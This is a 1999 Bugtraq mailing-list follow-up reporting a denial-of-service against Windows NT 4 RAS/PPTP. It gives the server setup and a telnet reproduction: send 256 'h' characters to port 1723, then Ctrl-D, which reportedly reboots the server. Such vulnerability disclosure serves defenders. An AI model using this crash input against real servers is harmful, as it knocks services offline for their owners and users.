[10363] in bugtraq
RE Possible DOS in WinNT RAS (PPTP)
daemon@ATHENA.MIT.EDU (Simon Helson)
Tue Apr 27 13:15:45 1999
Message-Id: <4.2.0.32.19990427204432.00a15a90@203.97.185.82>
Date: Tue, 27 Apr 1999 20:55:50 -0700
Reply-To: Simon Helson <simon@CONCEPTS.CO.NZ>
From: Simon Helson <simon@CONCEPTS.CO.NZ>
To: BUGTRAQ@NETSPACE.ORG
Hello again.
Please excuse the lack of detail in my first posting. I was trying to
recollect the events of the past evening.
Unfortunately I don't have unlimited access to an NT server to play with.
However, I have tried this again (on the same server), this time over the
Internet as opposed to a LAN (trying to remove the NIC from the equation).
Firstly, the NT setup:
NT Server Version 4, with Service Pack 4.0 applied.
(outside US version - only 40 bit)
PPTP added as a network device
Number of VPNs available - 2
then RAS service started.
The attack box setup:
RedHat Linux 5.2 running kernel 2.2.1
modem connection to the net
The procedure I followed:
[root@blobby /root]# telnet <removed for privacy> 1723
Trying <removed for privacy>...
Connected to <removed for privacy>.
Escape character is '^]'
hhhhhhhhhhhhhhh<type 256 times>
^d (not shown in output)
^]
telnet> close
Connection closed.
The instant I hit ^d his server rebooted. AFAIK there is nothing special in
the setup of the NT server.
I hope this clears up the picture.
Cheers
Simon